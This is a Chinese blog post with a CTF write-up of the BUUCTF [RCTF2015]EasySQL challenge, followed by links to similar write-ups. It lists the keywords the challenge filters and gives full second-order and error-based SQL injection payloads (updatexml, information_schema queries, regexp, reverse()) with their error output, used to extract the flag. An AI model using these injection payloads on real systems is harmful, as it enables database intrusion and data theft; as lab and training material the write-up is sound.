buuctf-[RCTF2015]EasySQL

最新推荐文章于 2025-03-26 15:09:28 发布
最新推荐文章于 2025-03-26 15:09:28 发布
阅读量411 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: web 文章标签: EasySQL BUUCTF [RCTF2015]
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43615820/article/details/108876216
本文探讨了SQL注入的常见手法,包括利用二次注入、报错注入以及正则函数来获取敏感信息。通过示例展示了如何注册含有危险字符的用户,利用updatexml函数进行信息爆破,以及针对不同数据库表和列进行信息泄露。同时,提到了reverse()函数在SQL注入中的应用。博客主要关注SQL安全和数据库漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Fuzz  测试
过滤:
	and  insert  ascii  substr  left rigth  sleep  floor  < like /**/  %20



思路:    注册带有危险符号的用户,登录之后修改密码,就能达到二次注入的效果



爆破:   admin"or(updatexml('~',concat('~',(),'~'),'~'))or"1


    用户:	admin"or(updatexml('~',concat('~',database(),'~'),'~'))or"1   
	
	XPATH syntax error: '~web_sqli~'



   表:  admin"or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema='web_sqli')),'~'),'~'))or"1

	XPATH syntax error: '~article,flag,users~'


列: admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),'~'),'~'))or"1
	admin"or(updatexml('~',concat('~',(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),'~'),'~'))or"1


	XPATH syntax error: '~flag~'
	name,pwd,email,real_flag_1s_her

	ereh_s1_galf_laer,liame,dwp,ema



flag       

	admin"or(updatexml('~',concat('~',(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1
	admin"or(updatexml('~',concat('~',(select(REVERSE(GROUP_CONCAT(real_flag_1s_here)))from(web_sqli.users)where(real_flag_1s_here)regexp('^f')),'~'),'~'))or"1

上面是自己研究的一些思路和姿势,以及写题的流程。

题目的考点是二次注入,报错注入,sql正则函数,reverse()函数。

23-1.1 SQL注入攻击 - 利用sqlmap探测盲注
weixin_43263566的博客
01-31 656
准备:使用bp抓到靶场的http请求,然后复制保存到 request.txt。如果想用时间盲注就将参数 B 改成 T 就行。我将复制的请求内容文件存在到kali的桌面上。如果要用 布尔盲注就将c参数T 改成B。注意:因为是盲注所以运行时间会有点长。:指定使用时间延迟注入技术进行测试。
[wp][RCTF2015]EasySQL
小飒的博客
07-05 518
有修改密码怀疑是2次注入 admin被注册 sqli-lab24关中遇到过二次注入 特地去看了下代码 一开始尝试admin’# 修改密码 admin还是登陆不上 使用admin"# 修改密码后,可以使用admin登陆上,但是没任何变化 试下报错注入 注册的时候发现有过滤 得到数据库名:web_sqli 得到表名article,flag,users 盲猜列名 flag 获得"~RCTF{Good job! But flag not her"疯了,只能试下别的表,希望不要是被我修改了的admin密码 real_
【合天网安】利用sqlmap辅助手工注入
hehigoxqc606的博客
09-02 566
实验背景: SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite 、Firebird、Sybase和SAP MaxDB。SQL Map采用了以下5种独特的SQL注入技术。 基于布尔型的盲注,即可以根据页面返回页面判断条件真假的注入。 基于时间的盲注,即不能根据页面返回的内
Buuctf——[RCTF2015]EasySQL
m_de_g的博客
09-18 1473
1.当空格被过滤时,使用括号绕过()2.当and被过滤时,使用||过滤3.当被过滤时,使用reverse绕过——相当于把字符串反过来打印出来4.报错注入用法5.二次注入。
BUUCTF:[RCTF2015]EasySQL
末初 · mochu7
03-29 4317
BUUCTF:[RCTF2015]EasySQL 参考:https://www.cnblogs.com/peri0d/p/11599643.html 先注册一个用户 在注册的时候,fuzz测试发现在username和email中过滤了以下字符: @ or and space(空格) substr mid left right handle 没有源码慢慢测试....... 登录,发现还有个改密...
[buuctf][RCTF2015]EasySQL
weixin_43952190的博客
07-26 1174
[RCTF2015]EasySQL 进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。 因为并不清楚sql语句的闭合方式,所以重新注册一个admin"#,登陆后也没有起到作用。 注册admin\,登陆进去后修改密码,结果出现报错。 可以看到原语句中的username是双引号闭合的,所以单引号注册的账号是不起作用的.由此推断,我们注册admin"#因为闭合语句且将后面进行了注释,所以是可以sql语句会变为
[RCTF2015]EasySQL
LYJ20010728的博客
06-25 289
[RCTF2015]EasySQL考点思路Payload 考点 二次注入、报错注入 思路 注册账号之后,发现登陆后有个修改密码,在修改密码的时候会查询数据库,所以应该存在二次注入 对username和email进行fuzz 注册时把用户名写成 'admin"\,发现在改密码时会报如下错误: 可以猜出来 sql 语句应该是类似于这样子的,所以我们可以利用二次注入和报错注入来获取flag select * from user where username="'admin"\" and p
BUUCTF_Web([RCTF2015]EasySQL)二次注入+报错注入
2401_87524087的博客
01-21 1064
二次注入是一次注入通过两次操作实现,注册和登陆。题目: 只有登录和注册两个选项。
2025.1.20——一、[RCTF2015]EasySQL1 二次注入|报错注入|代码审计
2402_87387800的博客
01-20 1235
题目来源:buuctf [RCTF2015]EasySQL1。
[初级]sql注入之二次注入[RCTF2015]EasySQL 1(报错注入,爆库,表)
BlingZeng的博客
02-09 3994
BUUCTF的[RCTF2015]EasySQL1 题目的解题文章,如果有兴趣可以一起探讨一下。使用的方法是二次注入,报错注入,爆库、表等手段
BUUCTF__web题解合集(十二)
风过江南乱的博客
10-14 1004
1、[BSidesCF 2019]Kookie 2、[CISCN2019 华北赛区 Day1 Web5]CyberPunk 3、[RCTF2015]EasySQL 4、[Zer0pts2020]Can you guess it? 5、[HITCON 2017]SSRFme
CTF-Web-SQL注入
beihai2013
01-26 3490
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
BUUCTF-RCTF2015-EasySQL
最新发布
weixin_64359465的博客
03-26 1829
二次注入是因为对username进行的操作修改了admin的密码,所以关键点是对username的操作,回想我们在修改密码时页面不存在回显,那我们应当考虑报错注入。尝试注册账号,尝试注册username为admin的账号,输入密码与邮箱,提交时发现页面显示 user exists 用户已存在。于是我注册的admin"#账号中后,并未发现有用的信息,于是尝试修改密码,看看能不能修改admin的密码。但是登录后的账号中与我们注册的账号大致一样,并不存在flag的值,说明flag不在这里。
BUU-WEB-[RCTF2015]EasySQL
qq_24033605的博客
05-20 405
[RCTF2015]EasySQL 先进去随便注册个账号,在username和email处有过滤机制,注册成功后,有个修改密码功能,可能在此处存在二次注入。 先在注册栏的username处进行fuzzy,看看有哪些sql语句不能用。 (长度为496的都是被过滤的) 尝试利用admin"注册。 注册成功后修改密码,发现报出sql错误。 猜测后台执行的修改语句为: update users set password='xxxx' where username="xxxx" and pwd='e10adc39
BUUCTF】[RCTF2015]EasySQL1
2401_86760082的博客
01-21 1036
用户输入的数据先被存储到数据库中(此时可能未被恶意利用),后续应用程序从数据库中读取该数据并再次使用在 SQL 查询中,而此时就可能导致 SQL 注入问题。发现here只显示her,未全部显示,因为 extractvalue函数最多显示32位,故使用 reverse()函数,将回显结果倒置。之后,在修改密码等操作中,系统从数据库读取这个用户名并构建 SQL 语句,如。组合得到flag:flag{4acbc4b8-4f30-40ea-a840-98ac491a8b02}爆出flag表的字段。
BUUCTF-[SUCTF 2019]EasySQL1
09-12
BUUCTF-[SUCTF 2019]EasySQL1 是一个关于SQL注入的题目。根据引用和引用的内容,我们可以得知,原始的查询语句是 $sql = "select ".$_POST[query]."|| flag from Flag" ,在这个语句中,用户的输入被直接拼接到了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值